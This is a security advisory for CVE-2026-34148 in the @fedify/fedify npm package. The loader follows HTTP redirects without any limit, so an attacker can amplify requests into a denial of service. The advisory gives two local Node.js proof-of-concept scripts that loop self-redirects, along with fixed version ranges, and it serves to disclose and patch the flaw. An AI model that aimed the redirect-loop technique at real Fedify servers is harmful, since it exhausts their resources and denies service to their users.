GHSA-GM9M-GWC4-HWGP
Vulnerability from github – Published: 2026-04-07 18:04 – Updated: 2026-04-07 18:04Summary
@fedify/fedify follows HTTP redirects recursively in its remote document loader and authenticated document loader without enforcing a maximum redirect count or visited-URL loop detection. An attacker who controls a remote ActivityPub key or actor URL can force a server using Fedify to make repeated outbound requests from a single inbound request, leading to resource consumption and denial of service.
Details
Fedify verifies ActivityPub HTTP signatures by fetching the remote keyId during request processing. The relevant flow is handleInboxInternal() -> verifyRequest() -> fetchKeyInternal() -> document loader.
In affected versions:
- the generic document loader recursively follows 3xx responses by calling load() again on the Location header
- the authenticated redirect path (doubleKnock()) also recursively follows redirects
- neither path enforces a redirect cap or tracks visited URLs to detect self-referential redirect loops
As a result, if an attacker-controlled keyId or actor URL responds with 302 Location: <same URL>, a single ActivityPub request can trigger tens or hundreds of outbound requests before the fetch completes or the request times out.
I confirmed the issue in @fedify/fedify 1.9.1 and 1.9.2. By contrast, Fedify's WebFinger lookup path already has a redirect cap, which suggests the missing bound in the document loader is unintended.
Failed key fetches are not durably negatively cached. After a failed lookup, the null result is only remembered in a request-local cache, so later requests can trigger the same redirect loop again for the same keyId.
PoC
Minimal direct reproduction with the package:
- Install
@fedify/fedify@1.9.2. - Save and run the following script:
import http from "node:http";
import { getDocumentLoader } from "@fedify/fedify";
const port = 45679;
let count = 0;
const redirectCount = 120;
const server = http.createServer((req, res) => {
count += 1;
if (count < redirectCount) {
res.writeHead(302, {
Location: `http://127.0.0.1:${port}/actor`,
});
res.end();
return;
}
res.writeHead(200, { "Content-Type": "application/activity+json" });
res.end(JSON.stringify({
"@context": "https://www.w3.org/ns/activitystreams",
"id": `http://127.0.0.1:${port}/actor`,
"type": "Person"
}));
});
await new Promise((resolve) => server.listen(port, "127.0.0.1", resolve));
try {
const loader = getDocumentLoader({ allowPrivateAddress: true });
await loader(`http://127.0.0.1:${port}/actor`);
console.log({ count });
} finally {
server.close();
}
- Observe output similar to:
{ count: 120 }
This shows the loader followed 119 self-redirects before the first non-redirect response.
The authenticated loader used for signed requests shows the same behavior:
import http from "node:http";
import {
generateCryptoKeyPair,
getAuthenticatedDocumentLoader,
} from "@fedify/fedify";
const port = 45680;
let count = 0;
const redirectCount = 120;
const server = http.createServer((req, res) => {
count += 1;
if (count < redirectCount) {
res.writeHead(302, {
Location: `http://127.0.0.1:${port}/actor`,
});
res.end();
return;
}
res.writeHead(200, { "Content-Type": "application/activity+json" });
res.end(JSON.stringify({
"@context": "https://www.w3.org/ns/activitystreams",
"id": `http://127.0.0.1:${port}/actor`,
"type": "Person"
}));
});
await new Promise((resolve) => server.listen(port, "127.0.0.1", resolve));
try {
const { privateKey } = await generateCryptoKeyPair();
const loader = getAuthenticatedDocumentLoader(
{
privateKey,
keyId: new URL("https://example.com/users/index#main-key"),
},
{ allowPrivateAddress: true },
);
await loader(`http://127.0.0.1:${port}/actor`);
console.log({ count });
} finally {
server.close();
}
Impact
This is an unauthenticated denial-of-service / request amplification issue. Any Fedify-based server that verifies remote keys or loads remote ActivityPub documents can be forced to spend CPU time, worker time, connection slots, and outbound bandwidth following attacker-controlled redirects. A single inbound request can trigger a large number of outbound requests, and the attack can be repeated across requests because failed lookups are not durably negatively cached.
Misc Notes
This issue was surfaced by a Ghost ActivityPub user reporting the issue directly to Ghost. The above report was generated upon further investigation into the issue by the Ghost team. The original reporter should be credited for the discovery.
In case you accept this advisory please coordinate time of disclosure and credit with us
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "@fedify/fedify"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "1.9.6"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "npm",
"name": "@fedify/vocab-runtime"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "2.0.8"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "npm",
"name": "@fedify/vocab-runtime"
},
"ranges": [
{
"events": [
{
"introduced": "2.1.0"
},
{
"fixed": "2.1.1"
}
],
"type": "ECOSYSTEM"
}
],
"versions": [
"2.1.0"
]
},
{
"package": {
"ecosystem": "npm",
"name": "@fedify/fedify"
},
"ranges": [
{
"events": [
{
"introduced": "1.10.0"
},
{
"fixed": "1.10.5"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "npm",
"name": "@fedify/fedify"
},
"ranges": [
{
"events": [
{
"introduced": "2.0.0"
},
{
"fixed": "2.0.8"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "npm",
"name": "@fedify/fedify"
},
"ranges": [
{
"events": [
{
"introduced": "2.1.0"
},
{
"fixed": "2.1.1"
}
],
"type": "ECOSYSTEM"
}
],
"versions": [
"2.1.0"
]
}
],
"aliases": [
"CVE-2026-34148"
],
"database_specific": {
"cwe_ids": [
"CWE-400",
"CWE-770"
],
"github_reviewed": true,
"github_reviewed_at": "2026-04-07T18:04:09Z",
"nvd_published_at": "2026-04-06T16:16:34Z",
"severity": "HIGH"
},
"details": "### Summary\n\n`@fedify/fedify` follows HTTP redirects recursively in its remote document loader and authenticated document loader without enforcing a maximum redirect count or visited-URL loop detection. An attacker who controls a remote ActivityPub key or actor URL can force a server using Fedify to make repeated outbound requests from a single inbound request, leading to resource consumption and denial of service.\n\n### Details\n\nFedify verifies ActivityPub HTTP signatures by fetching the remote `keyId` during request processing. The relevant flow is `handleInboxInternal()` -\u003e `verifyRequest()` -\u003e `fetchKeyInternal()` -\u003e document loader.\n\nIn affected versions:\n- the generic document loader recursively follows `3xx` responses by calling `load()` again on the `Location` header\n- the authenticated redirect path (`doubleKnock()`) also recursively follows redirects\n- neither path enforces a redirect cap or tracks visited URLs to detect self-referential redirect loops\n\nAs a result, if an attacker-controlled `keyId` or actor URL responds with `302 Location: \u003csame URL\u003e`, a single ActivityPub request can trigger tens or hundreds of outbound requests before the fetch completes or the request times out.\n\nI confirmed the issue in `@fedify/fedify` 1.9.1 and 1.9.2. By contrast, Fedify\u0027s WebFinger lookup path already has a redirect cap, which suggests the missing bound in the document loader is unintended.\n\nFailed key fetches are not durably negatively cached. After a failed lookup, the null result is only remembered in a request-local cache, so later requests can trigger the same redirect loop again for the same `keyId`.\n\n### PoC\n\nMinimal direct reproduction with the package:\n\n1. Install `@fedify/fedify@1.9.2`.\n2. Save and run the following script:\n\n```js\nimport http from \"node:http\";\nimport { getDocumentLoader } from \"@fedify/fedify\";\n\nconst port = 45679;\nlet count = 0;\nconst redirectCount = 120;\n\nconst server = http.createServer((req, res) =\u003e {\n count += 1;\n\n if (count \u003c redirectCount) {\n res.writeHead(302, {\n Location: `http://127.0.0.1:${port}/actor`,\n });\n res.end();\n return;\n }\n\n res.writeHead(200, { \"Content-Type\": \"application/activity+json\" });\n res.end(JSON.stringify({\n \"@context\": \"https://www.w3.org/ns/activitystreams\",\n \"id\": `http://127.0.0.1:${port}/actor`,\n \"type\": \"Person\"\n }));\n});\n\nawait new Promise((resolve) =\u003e server.listen(port, \"127.0.0.1\", resolve));\n\ntry {\n const loader = getDocumentLoader({ allowPrivateAddress: true });\n await loader(`http://127.0.0.1:${port}/actor`);\n console.log({ count });\n} finally {\n server.close();\n}\n```\n\n3. Observe output similar to:\n\n```\n{ count: 120 }\n```\n\nThis shows the loader followed 119 self-redirects before the first non-redirect response.\n\nThe authenticated loader used for signed requests shows the same behavior:\n\n```\nimport http from \"node:http\";\nimport {\n generateCryptoKeyPair,\n getAuthenticatedDocumentLoader,\n} from \"@fedify/fedify\";\n\nconst port = 45680;\nlet count = 0;\nconst redirectCount = 120;\n\nconst server = http.createServer((req, res) =\u003e {\n count += 1;\n\n if (count \u003c redirectCount) {\n res.writeHead(302, {\n Location: `http://127.0.0.1:${port}/actor`,\n });\n res.end();\n return;\n }\n\n res.writeHead(200, { \"Content-Type\": \"application/activity+json\" });\n res.end(JSON.stringify({\n \"@context\": \"https://www.w3.org/ns/activitystreams\",\n \"id\": `http://127.0.0.1:${port}/actor`,\n \"type\": \"Person\"\n }));\n});\n\nawait new Promise((resolve) =\u003e server.listen(port, \"127.0.0.1\", resolve));\n\ntry {\n const { privateKey } = await generateCryptoKeyPair();\n const loader = getAuthenticatedDocumentLoader(\n {\n privateKey,\n keyId: new URL(\"https://example.com/users/index#main-key\"),\n },\n { allowPrivateAddress: true },\n );\n\n await loader(`http://127.0.0.1:${port}/actor`);\n console.log({ count });\n} finally {\n server.close();\n}\n```\n\n### Impact\n\nThis is an unauthenticated denial-of-service / request amplification issue. Any Fedify-based server that verifies remote keys or loads remote ActivityPub documents can be forced to spend CPU time, worker time, connection slots, and outbound bandwidth following attacker-controlled redirects. A single inbound request can trigger a large number of outbound requests, and the attack can be repeated across requests because failed lookups are not durably negatively cached.\n\n### Misc Notes\n\nThis issue was surfaced by a Ghost ActivityPub user reporting the issue directly to Ghost. The above report was generated upon further investigation into the issue by the Ghost team. **The original reporter should be credited for the discovery**.\n\nIn case you accept this advisory please coordinate time of disclosure and credit with us",
"id": "GHSA-gm9m-gwc4-hwgp",
"modified": "2026-04-07T18:04:09Z",
"published": "2026-04-07T18:04:09Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/fedify-dev/fedify/security/advisories/GHSA-gm9m-gwc4-hwgp"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34148"
},
{
"type": "PACKAGE",
"url": "https://github.com/fedify-dev/fedify"
},
{
"type": "WEB",
"url": "https://github.com/fedify-dev/fedify/releases/tag/1.10.5"
},
{
"type": "WEB",
"url": "https://github.com/fedify-dev/fedify/releases/tag/1.9.6"
},
{
"type": "WEB",
"url": "https://github.com/fedify-dev/fedify/releases/tag/2.0.8"
},
{
"type": "WEB",
"url": "https://github.com/fedify-dev/fedify/releases/tag/2.1.1"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
],
"summary": "Fedify affected by resource exhaustion caused by unbounded redirect following during remote key/document resolution"
}
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.